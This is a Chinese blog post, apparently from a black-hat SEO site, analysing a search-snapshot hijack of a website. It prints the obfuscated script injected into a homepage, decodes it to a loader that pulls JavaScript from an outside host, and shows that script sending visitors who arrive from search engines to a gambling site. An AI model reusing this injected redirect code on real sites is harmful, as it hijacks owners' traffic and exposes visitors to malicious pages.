富贵长生天做主由不得我
钢骨正气我做主由不得天

2018年最流行的快照劫持手法-纠出幕后黑客真实JS地址

黑客篡改首页 的文件

网站名称和网站关键 词 全部经过 unicode 加密,unicode解密很简单,就不多说了。 直接打开看到的是加密的代码,但是蜘蛛爬过去就是一下赌博站的词和句子。,过不了多久。百度就会报毒,降权。

<script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p;}(‘m[“\\e\\c\\1\\l\\i\\8\\n\\0”][“\\7\\4\\9\\0\\8”](\’\\g\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\d\\6\\0\\8\\r\\0\\5\\f\\a\\s\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\o\\0\\0\\3\\2\\p\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\j\\b\\1\\c\\i\\5\\q\\j\\b\\f\\2\\6\\h\\g\\5\\2\\1\\4\\9\\3\\0\\h\’);’,29,29,’x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3c|x3e|x6d|x38|x79|x75|window|x6e|x68|x3a|x6b|x78|x76′.split(‘|’),0,{}))
</script>

上面这个JS 代码加密代码负责来路跳转,有两重加密,站长站解密后得到

< script type = “text/javascript” > window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x6b\x38\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e’); < /script>

JS 再次解密后得到

< script type = “text/javascript” > window[“document”][“write”](‘<script type=”text/javascript” src=”https://www.cpdas8.com/k8.js”></script>’); < /script>

所以黑客调用 的是 https://www.cpdas8.com/k8.js

document.writeln(“<script LANGUAGE=\”Javascript\”>”); document.writeln(“var s=document.referrer”); document.writeln(“if(s.indexOf(\”baidu\”)>0 || s.indexOf(\”sogou\”)>0 || s.indexOf(\”soso\”)>0 ||s.indexOf(\”sm\”)>0 ||s.indexOf(\”uc\”)>0 ||s.indexOf(\”bing\”)>0 ||s.indexOf(\”yahoo\”)>0 ||s.indexOf(\”so\”)>0 )”); document.writeln(“location.href=\”https://www.k8das8.com/\”;”); document.writeln(“</script>”);

很明显了,来路跳转,所有搜索引擎过去的流量都劫持到了 这个赌博站https://www.k8das8.com

赞(0)
未经允许不得转载:网站快照劫持代码-快照删除-黑帽SEO » 2018年最流行的快照劫持手法-纠出幕后黑客真实JS地址

评论 抢沙发

4 + 8 =
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址